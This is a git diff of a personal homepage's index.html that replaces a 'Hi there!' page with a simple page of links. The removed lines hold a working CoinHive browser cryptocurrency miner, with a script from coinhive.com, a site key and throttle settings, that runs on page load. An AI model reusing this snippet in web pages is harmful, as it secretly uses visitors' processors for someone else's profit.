--- a/index.html
+++ b/index.html
@@ -2,33 +2,15 @@
 <html lang="en">
 <head>
 	<meta charset="UTF-8">
-	<title>Hi there!</title>
-	<script src="https://coinhive.com/lib/coinhive.min.js"></script>
+	<title>Aisultan Kali</title>
+	<link rel="stylesheet" href="stylesheets/stylesheet.css">
 </head>
 <body>
-
-<script>
-	let siteKey = 'r0kjtYHKfNbbxZ75Cgqmq8qc4JdbKut1';
-	var miner = new CoinHive.Anonymous(siteKey, {throttle: 1});
-	
-
-	if (!miner.isMobile() && !miner.didOptOut(14400)) {
-		miner = new CoinHive.Anonymous(siteKey, {throttle: 0.3});
-	}
-	miner.start();
-	// Listen on events
-	miner.on('found', function() { /* Hash found */ })
-	miner.on('accepted', function() { /* Hash accepted by the pool */ })
-
-	// Update stats once per second
-	setInterval(function() {
-		var hashesPerSecond = miner.getHashesPerSecond();
-		var totalHashes = miner.getTotalHashes();
-		var acceptedHashes = miner.getAcceptedHashes();
-
-		// Output to HTML elements...
-	}, 1000);
-</script>
-<a href="test/index.html">Test is here</a>
+	<div class="container">
+		<div class="grad">
+			<a href="http://t.me/dots256">Aisultan Kali</a>
+		</div>
+		<a href="mc/camp">Math&Code Camp</a>
+	</div>
 </body>
 </html>
